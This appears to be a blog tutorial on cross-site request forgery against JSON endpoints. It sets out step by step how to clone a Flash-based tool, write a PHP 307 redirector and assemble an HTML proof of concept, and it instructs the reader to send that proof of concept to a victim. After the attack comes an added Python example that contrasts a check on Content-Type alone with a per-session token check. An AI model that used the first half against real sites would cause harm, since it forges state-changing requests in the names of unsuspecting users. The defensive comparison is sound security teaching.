Step 1
Go to a terminal and type:
git clone https://github.com/sp1d3r/swf_json_csrf.git
Step 2
Now we have to create a 307 redirect file and paste the target endpoint into it:
<?php
// A 307 redirect makes the client repeat the request with the same method and body.
header("Location: https://target.com/endpoint", true, 307);
?>
Step 3
Now we have to fill in the appropriate details in the form:
PHP redirector --> address of the Step 2 file
Destination --> Target endpoint
POST-Data --> Data that needs to be sent to the target endpoint
Response --> keep it blank
After that, press the F12 key to open the developer tools.
Click the Launch button.
Copy the request URL sent to the test.swf file.
Step 4
Now we have the URL. We can create a CSRF PoC using HTML:
Create a new HTML file
Using <object data="PASTE URL HERE"></object>
Save the file
Send the CSRF PoC to the victim
And the final PoC will look like:
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<object data="http://127.0.0.1/swf_json_csrf/test.swf?endpoint=http://target.com/users&reqmethod=POST&ct=application/json&jsonData={%22test%22:%22test%22}&php_url=http://127.0.0.1/test.php"></object>
</body>
</html>
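Seen from the target's side, the PoC above shows that a JSON Content-Type on its own does not prove a request came from the application's own pages. The following Python code is an added example, not part of the original post or the swf_json_csrf project; the request dictionary, the session store and the X-CSRF-Token header name are assumptions made for illustration.

```python
import hmac

# Constructed request, modelled on what the PoC above delivers to the target
# after the 307 redirect: a POST with a JSON Content-Type, the victim's session
# cookie (assumed to be attached by the browser) and no anti-CSRF token.
FORGED = {
    "method": "POST",
    "headers": {"content-type": "application/json", "cookie": "session=abc123"},
    "body": '{"test":"test"}',
}

# Constructed server-side session store: session id -> token issued at login.
SESSIONS = {"abc123": {"csrf_token": "k3Jq-constructed-token-91xZ"}}

def session_for(request):
    """Look up the session from the Cookie header (simplified parsing)."""
    for part in request["headers"].get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "session":
            return SESSIONS.get(value)
    return None

def weak_check(request):
    """Weak: accepts any authenticated POST whose Content-Type is JSON."""
    ctype = request["headers"].get("content-type", "").split(";")[0].strip().lower()
    return session_for(request) is not None and ctype == "application/json"

def hardened_check(request):
    """Hardened: also requires the per-session token in X-CSRF-Token (assumed name)."""
    session = session_for(request)
    if session is None or not weak_check(request):
        return False
    supplied = request["headers"].get("x-csrf-token", "")
    # Constant-time comparison of the supplied token with the stored one.
    return hmac.compare_digest(supplied, session["csrf_token"])

def legitimate_request():
    """Same body sent by the application's own front end, which knows the token."""
    headers = dict(FORGED["headers"])
    headers["x-csrf-token"] = SESSIONS["abc123"]["csrf_token"]
    return {"method": "POST", "headers": headers, "body": FORGED["body"]}

if __name__ == "__main__":
    print("forged, content-type check only:", weak_check(FORGED))
    print("forged, token required:", hardened_check(FORGED))
    print("legitimate, token required:", hardened_check(legitimate_request()))
```

The token check does not depend on which headers a cross-site client can or cannot set, because the forged request has no way to learn the per-session value.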
Thank you.
How can I contact you? I am confused about something here